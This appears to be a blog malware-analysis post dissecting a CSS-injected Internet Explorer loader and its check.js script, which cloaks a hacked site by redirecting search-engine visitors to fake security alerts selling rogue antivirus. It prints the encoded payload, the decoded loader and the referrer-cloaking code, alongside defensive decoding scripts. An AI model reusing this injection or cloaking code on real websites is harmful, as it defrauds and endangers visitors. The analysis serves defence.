Trojan.MalScript!html

Written by traversecode on . Posted in Exploit Analysis

Introduction:

This analysis report explains in detail how a MalScript is used to infect users and how the code was injected into the pages served by the compromised web server. It describes a tricky technique used by the malware writer.

Analysis of the MalScript-injected website:

Screenshot of the website:


When a user views the above website the browser loads all of the page's content, including a CSS (Cascading Style Sheets) file that carries the encoded malicious code. This does not mean CSS itself is malicious; the stylesheet simply has JavaScript embedded in it, tagged with the identifier JSSS (JavaScript Style Sheets).

JSSS is the name of a jQuery plugin that lets standard CSS files use the full range of jQuery selectors across browsers, and the injected script borrows that name for its element id and its variables (JSSS, JSS1, JSS2, JSS3). The plugin is not what runs the code, however. The CSS expression() construct is a proprietary Internet Explorer feature that evaluates its argument as JavaScript, repeatedly, as the page is laid out; so the margin-top declaration below executes the decoded payload in Internet Explorer, while browsers without expression() support discard it as an invalid value. The embedded malicious code is given below,

/* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%37%32%30%31%36%33%3B%20%4A%53%53%33%20%3D%20%27%2F%64%65%6D%6F%2F%77%65%62%61%64%6D%69%6E%2F%65%64%69%74%65%75%72%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%61%71%6F%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%64%65%6D%6F%2F%77%65%62%61%64%6D%69%6E%2F%65%64%69%74%65%75%72%2F%6C%69%62%2F%74%68%65%6D%65%73%2F%61%71%6F%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */

In the above code, unescape() turns the %XX-encoded string back into JavaScript source and eval() then executes it. Decoding the string by hand (without running it) gives the actual code shown below.

if (!document.getElementById('JSSS')) {        /* run once: on every later re-evaluation this guard fails */
    JSS1 = 59;                                  /* globals left for the second stage, check.js, to read */
    JSS2 = 2720163;
    JSS3 = '/demo/webadmin/editeur/lib/themes/aqo/dummy.htm';
    var js = document.createElement('script');  /* inject check.js into <head> */
    js.setAttribute('src', '/demo/webadmin/editeur/lib/themes/aqo/check.js');
    js.setAttribute('id', 'JSSS');              /* the id the guard above looks for */
    document.getElementsByTagName('head').item(0).appendChild(js)
};
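Decoding a stage like this by hand is tedious, and pasting it into a browser console executes it. The following is an added example, not code from the original post: a small Node.js script that finds expression(eval(unescape('...'))) wrappers in a stylesheet, decodes the %XX and %uXXXX payload statically by re-implementing the legacy unescape() semantics instead of calling eval, and then lists the script URLs the decoded loader would fetch, which is where the next stage lives. The sample stylesheet and its encoded string are constructed for this example (they decode to a two-statement loader pointing at a hypothetical /x/check.js, not to the payload above).

```javascript
// Added example (not from the original post): statically decode a CSS
// expression(eval(unescape('...'))) payload without ever calling eval.
// Runs under Node.js with no dependencies.

// Legacy JavaScript unescape() semantics: %XX is one Latin-1 code unit,
// %uXXXX is one UTF-16 code unit, anything else is copied through unchanged.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, h2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Find every expression(eval(unescape('...'))) wrapper in a stylesheet and
// return the encoded string next to its decoded form.  Matching the literal
// wrapper (rather than "anything inside expression()") keeps the decoder
// from being steered into other code paths.
function extractExpressionPayloads(css) {
  const re = /expression\s*\(\s*eval\s*\(\s*unescape\s*\(\s*(['"])((?:(?!\1).)*)\1\s*\)\s*\)\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(css)) !== null) {
    out.push({ encoded: m[2], decoded: legacyUnescape(m[2]) });
  }
  return out;
}

// Pull the URLs a decoded loader assigns via setAttribute('src', ...), so
// the second stage can be fetched for analysis instead of being run.
function findScriptSources(decodedJs) {
  const re = /setAttribute\s*\(\s*['"]src['"]\s*,\s*(['"])((?:(?!\1).)*)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(decodedJs)) !== null) out.push(m[2]);
  return out;
}

// Constructed sample stylesheet (our own, not the injected CSS from the post).
// The encoded string decodes to:
//   var js = document.createElement('script'); js.setAttribute('src', '/x/check.js');
const SAMPLE_CSS = `
body { margin: 0; }
/* deadbeef */ body { margin-top: expression(eval(unescape('%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%78%2F%63%68%65%63%6B%2E%6A%73%27%29%3B'))) }
`;

for (const p of extractExpressionPayloads(SAMPLE_CSS)) {
  console.log('decoded   :', p.decoded);
  console.log('next stage:', findScriptSources(p.decoded));
}
```

Point extractExpressionPayloads at the real stylesheet (read the file into a string first) and the decoded text is exactly the loader shown above, with check.js as the one script source; nothing has executed, so the same approach is safe inside an automated triage pipeline.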

What does this code do?

The above code runs only when the condition at the top holds: no element with the id JSSS exists yet. Because Internet Explorer re-evaluates expression() many times while the page is displayed, that guard makes sure the loader inserts the external script just once. It also leaves three globals, JSS1, JSS2 and JSS3, for the second stage to read. The external JavaScript file is then downloaded and run to check a few conditions, which may be why the script itself is named check.js. Analysing check.js gave the code below,

if ( (Math.random() * 60 < JSS1) &&   /* the text between "<" and "|ya|" is missing from this post; JSS1 (the loader's otherwise unused global, 59) and the search-engine regex prefix are reconstructed from the explanation below */
     document.referrer.match(/^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./) &&
     document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=/) &&
     !document.referrer.match(/[?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)/) ) {
    location.href = JSS3 + '?r=' + encodeURIComponent(document.referrer) + '&s=' + JSS2;
};

Taken together, the purpose of the code is clear. check.js inspects document.referrer to decide whether the visitor arrived by typing the URL directly (or from any ordinary link) or by clicking a result on one of the listed search engines. Direct visitors are shown the genuine page. Visitors who came from a listed search engine with a search term in the referrer are redirected, subject to a random check at the head of the condition, to a different page hosted on the same server, shown below; the original referrer (r=) and the number stored in JSS2 (s=) are passed along in the query string. The link to the fake page is "http://www.example.org/demo/webadmin/editeur/lib/themes/aqo/dummy.htm".

The first regular expression, /^http:\/\/([a-z0-9_\-]+\.)…, is anchored at the start of the referrer, steps over the leading hostname labels (for example www.) and then tests the domain against a list of known search engines: google, msn, yahoo, live, ask, dogpile, mywebsearch, yandex, rambler, aport, mail, gogo, poisk, alltheweb, fireball, freenet, abacho, wanadoo, free, club-internet, aliceadsl, alice, skynet, terra, ya, orange, clix, terravista, gratis-ting and suomi24. The second checks that the referrer's query string carries one of the parameter names these engines use for the search term: q, query, qs, searchfor, search_for, w, p, r, key, keywords, search_string, search_word, buscar, text, words, su, qt or rdata. The third, negated, rejects referrers whose search term contains an encoded colon (%3A) or double quote (%22), so a visitor who used a search operator such as site: or an exact-phrase search is left alone; that profile fits researchers and site owners rather than casual searchers. Together these tests let the script tell a visitor who arrived from a search-engine results page apart from one who typed the URL directly.
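To see exactly which visitors check.js diverts, here is an added example, not the post's own code, that lifts the three referrer tests into a pure function and runs them against a set of constructed referrers. The engine list, the parameter-name list and the %3A/%22 exclusion are copied from the script above; the Math.random() gate at the head of the original condition is left out so the result is deterministic, and the JSS2/JSS3 defaults are the values the loader sets.

```javascript
// Added example (not from the original post): the cloaking decision from
// check.js as a pure function, run offline against constructed referrers.

const ENGINES = /^http:\/\/([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\./;
const PARAMS = '(q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)';
const HAS_QUERY = new RegExp('[?&]' + PARAMS + '=');                 // a search term is present
const OPERATOR_QUERY = new RegExp('[?&]' + PARAMS + '=[^&]+(%3A|%22)'); // term contains ':' or '"'

// Returns the redirect target check.js would build for this referrer, or
// null when the visitor would be shown the genuine page.  jss2 and jss3
// default to the globals set by the first-stage loader.
function cloakDecision(referrer, { jss2 = 2720163, jss3 = '/demo/webadmin/editeur/lib/themes/aqo/dummy.htm' } = {}) {
  if (!ENGINES.test(referrer)) return null;        // direct visit, or not a listed engine
  if (!HAS_QUERY.test(referrer)) return null;      // engine page, but no search term
  if (OPERATOR_QUERY.test(referrer)) return null;  // site: / quoted-phrase searches are skipped
  return jss3 + '?r=' + encodeURIComponent(referrer) + '&s=' + jss2;
}

// Constructed referrers (not captured traffic) covering each branch.
const SAMPLES = [
  '',                                                         // typed the URL: genuine page
  'http://www.google.com/search?hl=en&q=free+antivirus',     // organic search: redirected
  'http://www.google.com/search?q=site%3Aexample.org+admin',  // operator search: genuine page
  'http://search.yahoo.com/search?p=%22exact+phrase%22',      // quoted phrase: genuine page
  'http://www.bing.com/search?q=free+antivirus',              // engine not in the list: genuine page
  'http://www.google.com/',                                   // engine homepage, no term: genuine page
];

function classifyAll(samples) {
  return samples.map(r => ({ referrer: r, redirect: cloakDecision(r) }));
}

for (const { referrer, redirect } of classifyAll(SAMPLES)) {
  console.log((redirect ? 'REDIRECT -> ' + redirect : 'genuine page') + '   <- ' + (referrer || '(no referrer)'));
}
```

Because the decision is made in the browser from document.referrer, a site owner who types the URL never sees the redirect, and fetching check.js with curl shows the logic in plain text; the redirect itself only fires in a browser that evaluates expression(), which is why reproducing the infection chain needs Internet Explorer (or a simulated referrer in a browser that runs the stage manually).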

The fake page then displays a dialog box that says "Your computer is compromised", as shown in the screenshot below,

Clicking OK redirected me once more, to the page that reveals the real purpose of the attack. The redirected page imitates the Windows Explorer interface, displays a fake "threats detected" message and prompts the visitor to install a rogue antivirus, as shown in the screenshot below.


What is behind this technique?

Techniques like this are mostly deployed on legitimate sites that have been compromised by attackers. When a user searches for keywords, the search engine returns relevant websites; if one of them has been compromised in this way, users who click through are redirected to the fake pages, while the site owner and anyone who visits the site directly see nothing unusual. This is how rogue antivirus creators earn money. Although this attack pushes a fake antivirus program, the same redirection can equally be used to install financial crimeware and other stealers that compromise the system's security.


Comments (11)

  • Mystery!!

    Hey boss!! What tool do you use to analyse the HTML page? And you used a URL decoder to decode the code, right?

    And when you navigated to the check.js code, did you use any particular tool for that?

    Btw, I was just browsing through and got to know your site. Good for beginners. How about joining hands with me?

    • Shiv

      There are many online tools available to decode encoded JavaScript. Once you decode the script you can find the check.js code, which checks which search engine the user has been routed from. You can use Fiddler, a web debugging tool, to monitor the contents downloaded from the website, which is what I used personally. And thanks for the feedback.

  • Mystery!!

    ///You can use fiddler which is a web debugging tool to monitor contents downloaded from the website which I used personally. And thanks for the feedback.///

    Yeah, I use the same, dude!! I am a reverse engineer!!!

    Expect more analysis of exploits!!! and JavaScript and manifest files!!

    I have one more question for you..!! You know nowadays most malware checks whether it is in a VM environment so that it remains dormant.. Just to know, are you patching EAX to "0" or do you use some other technique!!

    - Mystery !!

  • Mystery!!

    Hey boss..

    What, not interested in replying??

    I guess I asked you something.. You know that magic number for VM detection ;)

  • Mystery!!

    It's 564d****** :) :) :) :)

    • Shiv - Threat Research Analyst

      I am extremely sorry, I just saw your previous question. I used Malzilla to decode the encoded JavaScript. As regards VMware spies, I don't waste time fixing the malware to run it in a VM; instead I use a real PC which I have dedicated for analysis. This helps to run and find the complete code and behaviour. And thanks for the magic number ;-)

  • Mystery!!

    I would like to contact you through mail, just drop a mail to me so that I can reply to you..

    mysteryreverse@gmail.com

  • dragula

    There are a lot of ways to detect virtualization (VMware)…
    Google to make things clear.
    Search for articles by pferrie in Virus Bulletin magazine.
